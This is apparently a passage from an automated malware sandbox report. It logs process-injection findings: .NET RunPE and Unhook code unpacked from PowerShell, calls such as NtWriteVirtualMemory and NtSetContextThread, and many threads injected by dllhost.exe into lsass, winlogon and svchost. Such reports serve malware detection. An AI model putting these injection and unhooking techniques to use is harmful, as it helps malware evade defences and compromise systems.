Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0000022123C2CD80
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0000022123C284B0
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0000022123C28814
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0000022123C5CD80
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0000022123C584B0
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0000022123C58814
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000013F08E6CD80
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000013F08E68814
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000013F08E684B0
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000013F08E9CD80
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000013F08E98814
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000013F08E984B0
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_000001FD186D8814
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001FD186D84B0
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001FD186DCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000017C6DABCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DAB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000017C6DAB84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DAB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_0000017C6DAB8814
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000017C6DD7CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000017C6DD784B0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_0000017C6DD78814
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000202C0AECD80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000202C0B184B0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000202C0B18814
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000202C0B1CD80
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_000002A661308814
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002BAAEDFCD80
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDF8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002BAAEDF8814
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDF84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002BAAEDF84B0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_0000027053068814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_0000027053068814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002705306CD80
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_00000270530684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00000270530684B0

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7faed0000.16.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7f2866f10.15.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 34.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

37_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 870000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AEDC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AED92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B3A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B372EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: ECD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BDF62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29CC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5C3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1C3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA882EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FEF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4B1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E0062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
